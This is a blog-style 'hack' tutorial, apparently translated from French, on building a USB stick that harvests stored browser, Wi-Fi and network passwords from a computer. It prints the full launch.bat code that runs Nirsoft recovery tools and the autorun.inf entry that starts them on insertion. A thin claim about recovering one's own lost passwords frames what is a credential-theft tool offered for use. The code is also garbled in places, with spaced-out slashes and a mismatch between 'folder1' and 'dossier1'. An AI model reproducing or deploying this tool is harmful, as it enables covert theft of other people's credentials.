TUTO HACK: Creating a rootkit USB key

usb rookit
usb rookit

Dernière mise à jour: 7 mai 2022

Today we will see how to create a USB key which recovers passwords from a computer. This USB key runs automatically and recovers most passwords store on a computer.

It is really very useful especially when you have lost your Passwords.

To create a rootkit USB key, follow the steps below:

Step 1

We will first download some tools that allow us to recover the passwords of the most common applications. All these applications come from the Nirsoft site (http://www.nirsoft.net/).

Next, we are going to place all the .exe files on our USB key.

usb1

Step 2

Now you have to create a file launch.bat which will automatically open the password recovery programs and it will store the results in a text file.
For this, we must create a new text document with notepad or other and write the code below.

@ Echo off
start WebBrowserPassView.exe / stext folder1 / WebBrowserPassView.txt
start WirelessKeyView.exe / stext folder1 / WirelessKeyView.txt
start netpass.exe / stext folder1 / netpass.txt

Be careful to check that the names of the tools correspond to the names that are written in the file launch.bat .
At this stage, when launch.bat will be executed, these logs will be sent to a folder called dossier1. We must therefore create a new folder and name it dossier1.

Step 3

Then we will create the file autorun.inf. The autorun.inf file is a text file saved at the root of a storage device (DVD, USB key, etc.) used to automate the launch of certain programs when a storage device is inserted.
When you insert your USB key usually a window appears asking us what we want to do!
In this window, we will create a new option which will allow us (once we click on it) to recover passwords from the computer and stored them in the folder created in step 2.
To achieve this, open a new text document and insert the following code:

[Autorun]
open = launch.bat
ACTION='The name of the new option'

Finally, save the file autorun.inf.

Congratulations ! Your usb rootkit is now ready to use, all you have to do is test it.

Note: AutoRun is no longer available on Windows 7 and Windows 10. With the progression of viruses exploiting the AutoRun function to install themselves, Microsoft has decided to remove it from Windows 7 and 10 when connecting USB media to a PC.
So to recover passwords from a computer under Windows 7 egg Windows 10, you have to click manually on the small program Launch.bat.